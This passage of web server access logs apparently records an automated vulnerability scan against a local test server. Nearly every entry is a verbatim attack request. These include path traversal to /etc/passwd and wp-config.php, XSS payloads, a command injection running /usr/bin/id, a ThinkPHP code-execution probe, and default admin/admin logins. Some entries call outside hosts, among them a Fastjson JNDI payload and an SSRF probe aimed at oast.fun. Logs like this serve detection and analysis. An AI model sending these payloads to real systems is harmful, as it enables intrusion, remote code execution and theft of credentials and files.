/fpui/jsp/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/sdcall/Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/39 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/40 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/41 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/42 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/lesson/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /asd/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.004","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php?page=vfb-export HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1/wp-admin/admin.php?page=vfb-export", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/admin/login_action.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sensorlist.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ghost/preview HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/default.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /misc.php?action=showpopups&type=friend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/empty/search/results?limit=10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/cam_portal.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22LL\x5Cu0063\x5Cu006f\x5Cu006d.sun.rowset.JdbcRowSetImpl;;\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8h88smpv8c1ig07h0bqfug938enztw.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22token\x22: \x22Test\x22},\x22method\x22:\x22web.LoginSTS\x22}","remote_addr":"192.168.144.1","http_host":"c9v8h88smpv8c1ig07h01s54b73wpty4j.oast.fun","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /groovyconsole HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.228","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://c9v8h88smpv8c1ig07h0h3h5wzxuygt31.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"s=phpinfo()&_method=__construct&filter=assert","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?s=index/index/index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 